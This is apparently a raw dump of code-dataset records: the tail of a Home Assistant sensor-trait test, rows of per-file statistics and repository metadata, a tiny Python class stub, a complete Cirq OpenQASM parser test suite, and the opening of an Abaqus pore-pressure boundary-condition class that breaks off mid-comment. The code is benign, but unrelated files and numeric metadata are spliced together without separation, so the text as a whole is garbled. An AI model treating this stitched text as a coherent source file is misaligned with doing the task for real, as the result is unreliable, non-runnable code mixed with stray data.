"sensor.test", "70", {ATTR_DEVICE_CLASS: sensor.DEVICE_CLASS_TEMPERATURE}
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {
"queryOnlyTemperatureSetting": True,
"thermostatTemperatureUnit": "F",
}
assert trt.query_attributes() == {"thermostatTemperatureAmbient": 21.1}
hass.config.units.temperature_unit = TEMP_CELSIUS
async def test_humidity_setting_sensor(hass):
"""Test HumiditySetting trait support for humidity sensor."""
assert (
helpers.get_google_type(sensor.DOMAIN, sensor.DEVICE_CLASS_HUMIDITY) is not None
)
assert not trait.HumiditySettingTrait.supported(
sensor.DOMAIN, 0, sensor.DEVICE_CLASS_TEMPERATURE
)
assert trait.HumiditySettingTrait.supported(
sensor.DOMAIN, 0, sensor.DEVICE_CLASS_HUMIDITY
)
trt = trait.HumiditySettingTrait(
hass,
State("sensor.test", "70", {ATTR_DEVICE_CLASS: sensor.DEVICE_CLASS_HUMIDITY}),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {"queryOnlyHumiditySetting": True}
assert trt.query_attributes() == {"humidityAmbientPercent": 70}
with pytest.raises(helpers.SmartHomeError) as err:
await trt.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
assert err.value.code == const.ERR_NOT_SUPPORTED
| 33.305238
| 88
| 0.616829
| 6,116
| 55,320
| 5.315729
| 0.062786
| 0.025745
| 0.047922
| 0.032604
| 0.814924
| 0.778906
| 0.741749
| 0.722925
| 0.694873
| 0.631878
| 0
| 0.011254
| 0.270734
| 55,320
| 1,660
| 89
| 33.325301
| 0.794611
| 0.009942
| 0
| 0.553191
| 0
| 0
| 0.095813
| 0.02753
| 0
| 0
| 0
| 0
| 0.224924
| 1
| 0
| false
| 0.00304
| 0.008359
| 0
| 0.008359
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a635ba3fceff3791c5597724c7ede9451793da5
| 28
|
py
|
Python
|
tests/outputters/not-subclass.py
|
DonaldWhyte/module-dependency
|
0c4a1bddf3901340f44c28501ff677f2e9caef70
|
[
"MIT"
] | 5
|
2015-08-12T15:36:27.000Z
|
2021-06-27T22:49:00.000Z
|
tests/outputters/not-subclass.py
|
DonaldWhyte/module-dependency
|
0c4a1bddf3901340f44c28501ff677f2e9caef70
|
[
"MIT"
] | null | null | null |
tests/outputters/not-subclass.py
|
DonaldWhyte/module-dependency
|
0c4a1bddf3901340f44c28501ff677f2e9caef70
|
[
"MIT"
] | 1
|
2016-09-20T07:05:08.000Z
|
2016-09-20T07:05:08.000Z
|
class Outputter:
pass
| 9.333333
| 17
| 0.642857
| 3
| 28
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.321429
| 28
| 3
| 18
| 9.333333
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
8a642bf24f24fb46e48c9cc9a5b976515de2fd80
| 24,534
|
py
|
Python
|
cirq/contrib/qasm_import/_parser_test.py
|
muneerqu/Cirq
|
729d993312467d8ea9127103f9e15ae2391e7d85
|
[
"Apache-2.0"
] | 1
|
2020-07-14T19:43:54.000Z
|
2020-07-14T19:43:54.000Z
|
cirq/contrib/qasm_import/_parser_test.py
|
1eedaegon/Cirq
|
de0c5e855069bba71e55b070fc9b06f58c07a861
|
[
"Apache-2.0"
] | null | null | null |
cirq/contrib/qasm_import/_parser_test.py
|
1eedaegon/Cirq
|
de0c5e855069bba71e55b070fc9b06f58c07a861
|
[
"Apache-2.0"
] | 1
|
2019-12-16T15:52:44.000Z
|
2019-12-16T15:52:44.000Z
|
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
import sympy
import cirq
import cirq.testing as ct
from cirq import Circuit
from cirq.circuits.qasm_output import QasmUGate
from cirq.contrib.qasm_import import QasmException
from cirq.contrib.qasm_import._parser import QasmParser
def test_format_header_circuit():
parser = QasmParser()
parsed_qasm = parser.parse("OPENQASM 2.0;")
assert parsed_qasm.supportedFormat
assert not parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
def test_unsupported_format():
qasm = "OPENQASM 2.1;"
parser = QasmParser()
with pytest.raises(QasmException,
match="Unsupported.*2.1.*2.0.*supported.*"):
parser.parse(qasm)
def test_format_header_with_quelibinc_circuit():
qasm = """OPENQASM 2.0;
include "qelib1.inc";
"""
parser = QasmParser()
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
@pytest.mark.parametrize('qasm', [
"include \"qelib1.inc\";",
"",
"qreg q[3];",
])
def test_error_not_starting_with_format(qasm: str):
parser = QasmParser()
with pytest.raises(QasmException,
match="Missing 'OPENQASM 2.0;' statement"):
parser.parse(qasm)
def test_comments():
parser = QasmParser()
parsed_qasm = parser.parse("""
//this is the format
OPENQASM 2.0;
// this is some other comment
include "qelib1.inc";
// and something at the end of the file
// multiline
""")
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
def test_multiple_qreg_declaration():
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg a_quantum_register [ 1337 ];
qreg q[42];
"""
parser = QasmParser()
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
assert parsed_qasm.qregs == {'a_quantum_register': 1337, 'q': 42}
@pytest.mark.parametrize('qasm', [
"""OPENQASM 2.0;
qreg q[2];
creg q[3];
""",
"""OPENQASM 2.0;
creg q[2];
qreg q[3];
""",
])
def test_already_defined_error(qasm: str):
parser = QasmParser()
with pytest.raises(QasmException, match=r"q.*already defined.* line 3"):
parser.parse(qasm)
@pytest.mark.parametrize('qasm', [
"""OPENQASM 2.0;
qreg q[0];
""",
"""OPENQASM 2.0;
creg q[0];
""",
])
def test_zero_length_register(qasm: str):
parser = QasmParser()
with pytest.raises(QasmException, match=".* zero-length.*'q'.*line 2"):
parser.parse(qasm)
def test_unexpected_end_of_file():
qasm = """OPENQASM 2.0;
include "qelib1.inc";
creg
"""
parser = QasmParser()
with pytest.raises(QasmException, match="Unexpected end of file"):
parser.parse(qasm)
def test_multiple_creg_declaration():
qasm = """OPENQASM 2.0;
include "qelib1.inc";
creg a_classical_register [1337];
qreg a_quantum_register [1337];
creg c[42];
"""
parser = QasmParser()
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, Circuit())
assert parsed_qasm.qregs == {'a_quantum_register': 1337}
assert parsed_qasm.cregs == {'a_classical_register': 1337, 'c': 42}
def test_syntax_error():
qasm = """OPENQASM 2.0;
qreg q[2] bla;
foobar q[0];
"""
parser = QasmParser()
with pytest.raises(QasmException, match=r"""Syntax error: 'bla'.*"""):
parser.parse(qasm)
def test_CX_gate():
qasm = """OPENQASM 2.0;
qreg q1[2];
qreg q2[2];
CX q1[0], q1[1];
CX q1, q2[0];
CX q2, q1;
"""
parser = QasmParser()
q1_0 = cirq.NamedQubit('q1_0')
q1_1 = cirq.NamedQubit('q1_1')
q2_0 = cirq.NamedQubit('q2_0')
q2_1 = cirq.NamedQubit('q2_1')
expected_circuit = Circuit()
# CX q1[0], q1[1];
expected_circuit.append(cirq.CNOT(q1_0, q1_1))
# CX q1, q2[0];
expected_circuit.append(cirq.CNOT(q1_0, q2_0))
expected_circuit.append(cirq.CNOT(q1_1, q2_0))
# CX q2, q1;
expected_circuit.append(cirq.CNOT(q2_0, q1_0))
expected_circuit.append(cirq.CNOT(q2_1, q1_1))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert not parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q1': 2, 'q2': 2}
def test_CX_gate_not_enough_args():
qasm = """OPENQASM 2.0;
qreg q[2];
CX q[0];
"""
parser = QasmParser()
with pytest.raises(QasmException, match=r"CX.*takes.*got.*1.*line 3"):
parser.parse(qasm)
def test_CX_gate_mismatched_registers():
qasm = """OPENQASM 2.0;
qreg q1[2];
qreg q2[3];
CX q1, q2;
"""
parser = QasmParser()
with pytest.raises(QasmException,
match=r"Non matching.*length \[2 3\].*line 4"):
parser.parse(qasm)
def test_CX_gate_bounds():
qasm = """OPENQASM 2.0;
qreg q1[2];
qreg q2[3];
CX q1[4], q2[0];
"""
parser = QasmParser()
with pytest.raises(QasmException, match=r"Out of bounds.*4.*q1.*2.*line 4"):
parser.parse(qasm)
def test_CX_gate_arg_overlap():
qasm = """OPENQASM 2.0;
qreg q1[2];
qreg q2[3];
CX q1[1], q1[1];
"""
parser = QasmParser()
with pytest.raises(QasmException, match=r"Overlapping.*at line 4"):
parser.parse(qasm)
def test_U_gate():
qasm = """
OPENQASM 2.0;
qreg q[2];
U(pi, 2.3, 3) q[0];
U(+3.14, -pi, (8)) q;
"""
parser = QasmParser()
q0 = cirq.NamedQubit('q_0')
q1 = cirq.NamedQubit('q_1')
expected_circuit = Circuit()
expected_circuit.append(
cirq.Moment([
QasmUGate(1.0, 2.3 / np.pi, 3 / np.pi)(q0),
QasmUGate(3.14 / np.pi, -1.0, 8 / np.pi)(q1)
]))
expected_circuit.append(
cirq.Moment([QasmUGate(3.14 / np.pi, -1.0, 8 / np.pi)(q0)]))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert not parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q': 2}
def test_U_angles():
qasm = """
OPENQASM 2.0;
qreg q[1];
U(pi/2,0,pi) q[0];
"""
c = QasmParser().parse(qasm).circuit
cirq.testing.assert_allclose_up_to_global_phase(cirq.unitary(c),
cirq.unitary(cirq.H),
atol=1e-7)
def test_U_gate_zero_params_error():
qasm = """OPENQASM 2.0;
qreg q[2];
U q[1];"""
parser = QasmParser()
with pytest.raises(QasmException, match=r"U takes 3.*got.*0.*line 3"):
parser.parse(qasm)
def test_U_gate_too_much_params_error():
qasm = """OPENQASM 2.0;
qreg q[2];
U(pi, pi, pi, pi) q[1];"""
parser = QasmParser()
with pytest.raises(QasmException, match=r"U takes 3.*got.*4.*line 3"):
parser.parse(qasm)
@pytest.mark.parametrize(
'expr',
[
'.333 + 4',
'1.0 * 2',
'0.1 ^ pi',
'0.1 / pi',
'2.0e-05 ^ (1/2)',
'1.2E+05 * (3 + 2)',
'123123.2132312 * cos(pi)',
'123123.2132312 * sin(2 * pi)',
'3 - 4 * 2', # precedence of *
'3 * 4 + 2', # precedence of *
'3 * 4 ^ 2', # precedence of ^
'3 - 4 ^ 2', # precedence of ^
'3^2^(-2)', # right associativity of ^
'(-1) * pi',
'(+1) * pi',
'-3 * 5 + 2',
'(+4 * (-3) ^ 5 - 2)',
'tan(123123.2132312)',
'ln(pi)',
'exp(2*pi)',
'sqrt(4)',
'acos(1)',
'atan(0.2)',
])
def test_expressions(expr: str):
qasm = """OPENQASM 2.0;
qreg q[1];
U({}, 2 * pi, pi / 2.0) q[0];
""".format(expr)
parser = QasmParser()
q0 = cirq.NamedQubit('q_0')
expected_circuit = Circuit()
expected_circuit.append(
QasmUGate(float(sympy.sympify(expr)) / np.pi, 2.0, 1 / 2.0)(q0))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert not parsed_qasm.qelib1Include
ct.assert_allclose_up_to_global_phase(cirq.unitary(parsed_qasm.circuit),
cirq.unitary(expected_circuit),
atol=1e-10)
assert parsed_qasm.qregs == {'q': 1}
def test_unknown_function():
qasm = """OPENQASM 2.0;
qreg q[1];
U(nonexistent(3), 2 * pi, pi / 3.0) q[0];
"""
parser = QasmParser()
with pytest.raises(QasmException,
match=r".*not recognized.*'nonexistent'.*line 3"):
parser.parse(qasm)
rotation_gates = [
('rx', cirq.Rx),
('ry', cirq.Ry),
('rz', cirq.Rz),
]
single_qubit_gates = [
('x', cirq.X),
('y', cirq.Y),
('z', cirq.Z),
('h', cirq.H),
('s', cirq.S),
('t', cirq.T),
('sdg', cirq.S**-1),
('tdg', cirq.T**-1),
]
@pytest.mark.parametrize('qasm_gate,cirq_gate', rotation_gates)
def test_rotation_gates(qasm_gate: str, cirq_gate: cirq.SingleQubitGate):
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{0}(pi/2) q[0];
{0}(pi) q;
""".format(qasm_gate)
parser = QasmParser()
q0 = cirq.NamedQubit('q_0')
q1 = cirq.NamedQubit('q_1')
expected_circuit = Circuit()
expected_circuit.append(
cirq.Moment([cirq_gate(np.pi / 2).on(q0),
cirq_gate(np.pi).on(q1)]))
expected_circuit.append(cirq.Moment([
cirq_gate(np.pi).on(q0),
]))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q': 2}
@pytest.mark.parametrize('qasm_gate', [g[0] for g in rotation_gates])
def test_rotation_gates_wrong_number_of_args(qasm_gate: str):
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{}(pi) q[0], q[1];
""".format(qasm_gate)
parser = QasmParser()
with pytest.raises(
QasmException,
match=r".*{}.* takes 1.*got.*2.*line 5".format(qasm_gate)):
parser.parse(qasm)
@pytest.mark.parametrize('qasm_gate', [g[0] for g in rotation_gates])
def test_rotation_gates_zero_params_error(qasm_gate: str):
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[1];
""".format(qasm_gate)
parser = QasmParser()
with pytest.raises(
QasmException,
match=r".*{}.* takes 1.*got.*0.*line 4".format(qasm_gate)):
parser.parse(qasm)
def test_qelib_gate_without_include_statement():
qasm = """OPENQASM 2.0;
qreg q[2];
x q[0];
"""
parser = QasmParser()
with pytest.raises(QasmException,
match=r"""Unknown gate "x".* line 3.*forget.*\?"""):
parser.parse(qasm)
def test_undefined_register_from_qubit_arg():
qasm = """OPENQASM 2.0;
qreg q[2];
CX q[0], q2[1];
"""
parser = QasmParser()
with pytest.raises(QasmException, match=r"""Undefined.*register.*q2.*"""):
parser.parse(qasm)
def test_undefined_register_from_register_arg():
qasm = """OPENQASM 2.0;
qreg q[2];
qreg q2[2];
CX q1, q2;
"""
parser = QasmParser()
with pytest.raises(QasmException, match=r"""Undefined.*register.*q.*"""):
parser.parse(qasm)
def test_measure_individual_bits():
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
creg c1[2];
measure q1[0] -> c1[0];
measure q1[1] -> c1[1];
"""
parser = QasmParser()
q1_0 = cirq.NamedQubit('q1_0')
q1_1 = cirq.NamedQubit('q1_1')
expected_circuit = Circuit()
expected_circuit.append(
cirq.MeasurementGate(num_qubits=1, key='c1_0').on(q1_0))
expected_circuit.append(
cirq.MeasurementGate(num_qubits=1, key='c1_1').on(q1_1))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q1': 2}
assert parsed_qasm.cregs == {'c1': 2}
def test_measure_registers():
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[3];
creg c1[3];
measure q1 -> c1;
"""
parser = QasmParser()
q1_0 = cirq.NamedQubit('q1_0')
q1_1 = cirq.NamedQubit('q1_1')
q1_2 = cirq.NamedQubit('q1_2')
expected_circuit = Circuit()
expected_circuit.append(
cirq.MeasurementGate(num_qubits=1, key='c1_0').on(q1_0))
expected_circuit.append(
cirq.MeasurementGate(num_qubits=1, key='c1_1').on(q1_1))
expected_circuit.append(
cirq.MeasurementGate(num_qubits=1, key='c1_2').on(q1_2))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q1': 3}
assert parsed_qasm.cregs == {'c1': 3}
def test_measure_mismatched_register_size():
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
creg c1[3];
measure q1 -> c1;
"""
parser = QasmParser()
with pytest.raises(QasmException,
match=r""".*mismatched .* 2 -> 3.*line 5"""):
parser.parse(qasm)
def test_measure_to_quantum_register():
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[3];
qreg q2[3];
creg c1[3];
measure q2 -> q1;
"""
parser = QasmParser()
with pytest.raises(QasmException,
match=r"""Undefined classical register.*q1.*line 6"""):
parser.parse(qasm)
def test_measure_undefined_classical_bit():
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[3];
creg c1[3];
measure q1[1] -> c2[1];
"""
parser = QasmParser()
with pytest.raises(QasmException,
match=r"""Undefined classical register.*c2.*line 5"""):
parser.parse(qasm)
def test_measure_from_classical_register():
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
creg c1[3];
creg c2[3];
measure c1 -> c2;
"""
parser = QasmParser()
with pytest.raises(QasmException,
match=r"""Undefined quantum register.*c1.*line 6"""):
parser.parse(qasm)
def test_measurement_bounds():
qasm = """OPENQASM 2.0;
qreg q1[3];
creg c1[3];
measure q1[0] -> c1[4];
"""
parser = QasmParser()
with pytest.raises(QasmException,
match=r"Out of bounds bit.*4.*c1.*size 3.*line 4"):
parser.parse(qasm)
def test_u2_gate():
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[1];
u2(2 * pi, pi / 3.0) q[0];
"""
parser = QasmParser()
q0 = cirq.NamedQubit('q_0')
expected_circuit = Circuit()
expected_circuit.append(QasmUGate(0.5, 2.0, 1.0 / 3.0)(q0))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q': 1}
def test_id_gate():
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
id q;
"""
parser = QasmParser()
q0 = cirq.NamedQubit('q_0')
q1 = cirq.NamedQubit('q_1')
expected_circuit = Circuit()
expected_circuit.append(cirq.IdentityGate(num_qubits=1)(q0))
expected_circuit.append(cirq.IdentityGate(num_qubits=1)(q1))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q': 2}
def test_u3_gate():
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
u3(pi, 2.3, 3) q[0];
u3(+3.14, -pi, (8)) q;
"""
parser = QasmParser()
q0 = cirq.NamedQubit('q_0')
q1 = cirq.NamedQubit('q_1')
expected_circuit = Circuit()
expected_circuit.append(
cirq.Moment([
QasmUGate(1.0, 2.3 / np.pi, 3 / np.pi)(q0),
QasmUGate(3.14 / np.pi, -1.0, 8 / np.pi)(q1),
]))
expected_circuit.append(
cirq.Moment([QasmUGate(3.14 / np.pi, -1.0, 8 / np.pi)(q0)]))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q': 2}
@pytest.mark.parametrize('qasm_gate', [
'id',
'u2',
'u3',
] + [g[0] for g in rotation_gates] + [g[0] for g in single_qubit_gates])
def test_standard_single_qubit_gates_wrong_number_of_args(qasm_gate):
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[0], q[1];
""".format(qasm_gate)
parser = QasmParser()
with pytest.raises(QasmException, match=r".* takes 1.*got.*2.*line 5"):
parser.parse(qasm)
@pytest.mark.parametrize(['qasm_gate', 'num_params'], [
['id', 0],
['u2', 2],
['u3', 3],
['rx', 1],
['ry', 1],
['rz', 1],
] + [[g[0], 0] for g in single_qubit_gates])
def test_standard_gates_wrong_params_error(qasm_gate: str, num_params: int):
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{}(pi, 2*pi, 3*pi, 4*pi, 5*pi) q[1];
""".format(qasm_gate)
parser = QasmParser()
with pytest.raises(QasmException,
match=r".*{}.* takes {}.*got.*5.*line 4".format(
qasm_gate, num_params)):
parser.parse(qasm)
if num_params == 0: return
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[1];
""".format(qasm_gate)
parser = QasmParser()
with pytest.raises(QasmException,
match=r".*{}.* takes {}.*got.*0.*line 4".format(
qasm_gate, num_params)):
parser.parse(qasm)
two_qubit_gates = [('cx', cirq.CNOT), ('CX', cirq.CNOT), ('cz', cirq.CZ),
('cy', cirq.ControlledGate(cirq.Y)), ('swap', cirq.SWAP),
('ch', cirq.ControlledGate(cirq.H))]
@pytest.mark.parametrize('qasm_gate,cirq_gate', two_qubit_gates)
def test_two_qubit_gates(qasm_gate: str, cirq_gate: cirq.TwoQubitGate):
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
qreg q2[2];
{0} q1[0], q1[1];
{0} q1, q2[0];
{0} q2, q1;
""".format(qasm_gate)
parser = QasmParser()
q1_0 = cirq.NamedQubit('q1_0')
q1_1 = cirq.NamedQubit('q1_1')
q2_0 = cirq.NamedQubit('q2_0')
q2_1 = cirq.NamedQubit('q2_1')
expected_circuit = Circuit()
# CX q1[0], q1[1];
expected_circuit.append(cirq_gate(q1_0, q1_1))
# CX q1, q2[0];
expected_circuit.append(cirq_gate(q1_0, q2_0))
expected_circuit.append(cirq_gate(q1_1, q2_0))
# CX q2, q1;
expected_circuit.append(cirq_gate(q2_0, q1_0))
expected_circuit.append(cirq_gate(q2_1, q1_1))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q1': 2, 'q2': 2}
@pytest.mark.parametrize('qasm_gate', [g[0] for g in two_qubit_gates])
def test_two_qubit_gates_not_enough_args(qasm_gate: str):
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[0];
""".format(qasm_gate)
parser = QasmParser()
with pytest.raises(
QasmException,
match=r".*{}.* takes 2 arg\(s\).*got.*1.*line 5".format(qasm_gate)):
parser.parse(qasm)
@pytest.mark.parametrize('qasm_gate', [g[0] for g in two_qubit_gates])
def test_two_qubit_gates_with_too_much_parameters(qasm_gate: str):
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{}(pi) q[0],q[1];
""".format(qasm_gate)
parser = QasmParser()
with pytest.raises(
QasmException,
match=r".*{}.* takes 0 parameter\(s\).*got.*1.*line 5".format(
qasm_gate)):
parser.parse(qasm)
three_qubit_gates = [('ccx', cirq.TOFFOLI), ('cswap', cirq.CSWAP)]
@pytest.mark.parametrize('qasm_gate,cirq_gate', three_qubit_gates)
def test_three_qubit_gates(qasm_gate: str, cirq_gate: cirq.TwoQubitGate):
qasm = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q1[2];
qreg q2[2];
qreg q3[2];
{0} q1[0], q1[1], q2[0];
{0} q1, q2[0], q3[0];
{0} q1, q2, q3;
""".format(qasm_gate)
parser = QasmParser()
q1_0 = cirq.NamedQubit('q1_0')
q1_1 = cirq.NamedQubit('q1_1')
q2_0 = cirq.NamedQubit('q2_0')
q2_1 = cirq.NamedQubit('q2_1')
q3_0 = cirq.NamedQubit('q3_0')
q3_1 = cirq.NamedQubit('q3_1')
expected_circuit = Circuit()
expected_circuit.append(cirq_gate(q1_0, q1_1, q2_0))
expected_circuit.append(cirq_gate(q1_0, q2_0, q3_0))
expected_circuit.append(cirq_gate(q1_1, q2_0, q3_0))
expected_circuit.append(cirq_gate(q1_0, q2_0, q3_0))
expected_circuit.append(cirq_gate(q1_1, q2_1, q3_1))
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q1': 2, 'q2': 2, 'q3': 2}
@pytest.mark.parametrize('qasm_gate', [g[0] for g in three_qubit_gates])
def test_three_qubit_gates_not_enough_args(qasm_gate: str):
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{} q[0];
""".format(qasm_gate)
parser = QasmParser()
with pytest.raises(
QasmException,
match=r""".*{}.* takes 3 arg\(s\).*got.*1.*line 4""".format(
qasm_gate)):
parser.parse(qasm)
@pytest.mark.parametrize('qasm_gate', [g[0] for g in three_qubit_gates])
def test_three_qubit_gates_with_too_much_parameters(qasm_gate: str):
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[3];
{}(pi) q[0],q[1],q[2];
""".format(qasm_gate)
parser = QasmParser()
with pytest.raises(
QasmException,
match=r""".*{}.*parameter.*line 4.*""".format(qasm_gate)):
parser.parse(qasm)
@pytest.mark.parametrize('qasm_gate,cirq_gate', single_qubit_gates)
def test_single_qubit_gates(qasm_gate: str, cirq_gate: cirq.SingleQubitGate):
qasm = """OPENQASM 2.0;
include "qelib1.inc";
qreg q[2];
{0} q[0];
{0} q;
""".format(qasm_gate)
parser = QasmParser()
q0 = cirq.NamedQubit('q_0')
q1 = cirq.NamedQubit('q_1')
expected_circuit = Circuit([
cirq_gate.on(q0),
cirq_gate.on(q0),
cirq_gate.on(q1),
])
parsed_qasm = parser.parse(qasm)
assert parsed_qasm.supportedFormat
assert parsed_qasm.qelib1Include
ct.assert_same_circuits(parsed_qasm.circuit, expected_circuit)
assert parsed_qasm.qregs == {'q': 2}
| 25.66318
| 80
| 0.5869
| 3,246
| 24,534
| 4.258164
| 0.077018
| 0.061496
| 0.035451
| 0.044567
| 0.827594
| 0.795977
| 0.780133
| 0.74215
| 0.664593
| 0.621762
| 0
| 0.050019
| 0.263349
| 24,534
| 955
| 81
| 25.690052
| 0.714768
| 0.021277
| 0
| 0.632857
| 0
| 0.001429
| 0.257874
| 0.011553
| 0
| 0
| 0
| 0
| 0.098571
| 1
| 0.067143
| false
| 0
| 0.012857
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a7291c2640a59d12a9c9e2e175d9401aa18146c
| 7,687
|
py
|
Python
|
src/abaqus/BoundaryCondition/PorePressureBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/BoundaryCondition/PorePressureBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/BoundaryCondition/PorePressureBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
import typing
from abaqusConstants import *
from .BoundaryCondition import BoundaryCondition
from ..Region.Region import Region
class PorePressureBC(BoundaryCondition):
"""The PorePressureBC object stores the data for a pore pressure boundary condition.
The PorePressureBC object is derived from the BoundaryCondition object.
Attributes
----------
name: str
A String specifying the boundary condition repository key.
distributionType: SymbolicConstant
A SymbolicConstant specifying how the boundary condition is distributed spatially.
Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
fieldName: str
A String specifying the name of the :py:class:`~abaqus.Field.AnalyticalField.AnalyticalField` object associated with this boundary
condition. The **fieldName** argument applies only when **distributionType=FIELD**. The
default value is an empty string.
category: SymbolicConstant
A SymbolicConstant specifying the category of the boundary condition. Possible values
are MECHANICAL and THERMAL.
region: Region
A :py:class:`~abaqus.Region.Region.Region` object specifying the region to which the boundary condition is applied.
localCsys: str
None or a :py:class:`~abaqus.Datum.DatumCsys.DatumCsys` object specifying the local coordinate system of the boundary
condition's degrees of freedom. If **localCsys=None**, the degrees of freedom are defined
in the global coordinate system. The default value is None.
Notes
-----
This object can be accessed by:
.. code-block:: python
import load
mdb.models[name].boundaryConditions[name]
"""
# A String specifying the boundary condition repository key.
name: str = ''
# A SymbolicConstant specifying how the boundary condition is distributed spatially.
# Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
distributionType: SymbolicConstant = UNIFORM
# A String specifying the name of the AnalyticalField object associated with this boundary
